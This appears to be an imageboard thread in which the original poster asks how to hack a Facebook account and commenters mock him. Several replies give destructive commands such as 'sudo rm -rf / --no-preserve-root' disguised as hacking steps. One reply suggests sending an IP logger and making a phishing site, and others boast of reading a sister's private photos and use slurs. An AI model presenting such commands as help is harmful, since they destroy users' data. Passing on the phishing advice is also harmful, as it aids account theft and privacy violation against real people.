Got Linux. But know idea how to hack facebook. I only know how to do it when they are in my house. Any tips?

Got Linux. But know idea how to hack facebook. I only know how to do it when they are in my house. Any tips?

Other urls found in this thread:

youtu.be/SlmgwHAXgB4?t=346
twitter.com/AnonBabble

Get a catholic bible.

how to hack it when they in your house ?

you are a fucking idiot. Hope you are a troll

getting linux doesnt make you a hacker, its just what hackers use

you dont turn a banker into a software engineer by feeding him pizza either

1. Open Facebook (any browser works)
2. Go to the Profile you want to hack
3. Open command line.
4. Type: rm -rf
If this does not work try: cd / && rm -rf *
5.??????
6. Profit.

>*sudo rm -rf /
> or sudo -i then rm -rf /
not being a twat, just helping OP be the best hacker

Send a ip logger, make a phishing site en send it to them

this didn't work, my computer doesnt work now

shit. you are right. Thanks for the fix.
OP better be quick, befor Facebook patches this exploit.

Really? I just hacked my sister's profile and got some lude pictures...

>tfw no hot sister to hack

dont think you need sudo if you are using kali the epic hacker distro

Jokes on you idiot. I have Linux too, and I hacked your sisters account first! I swapped her pics for mine. those pictures are of my dick, not your sister's haha!

mkdir -s opisfag

Yeah kali is stupid as fuck. Ironic how an operating system designed to test security runs the user and every service as root. Super secure

Not using the superior sudo rm -rf / --no-preserve-root
Have fun in jail faggot need to remove the rootkit when you're done so you don't get caught

It's not ment to be installed, it's designed to run from a usb and be used only for pen testing, only a moron would use it for browsing dank memes day to day

I'd just like to interject for a moment. What you’re referring to as Linux, is in fact, GNU/Linux, or as I’ve recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called “Linux”, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project. There really is a Linux, and these people are using it, but it is just a part of the system they use.
Linux is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called “Linux” distributions are really distributions of GNU/Linux.

thanks doc

>when the copypasta is the best info of the thread

heres where you is wrong my friend kali is not just for penedation test it also PERFECT for review desktop environment on youtube :-)
youtu.be/SlmgwHAXgB4?t=346

Doesn't matter if its installed or booted from a USB, running everything running as root is still a terrible idea. If someone pwns you back, all future stuff could be compromised. Plus from a USB booted distro you still have access to the hard disk. If they get access to any other sector you are fucked

What is useradd?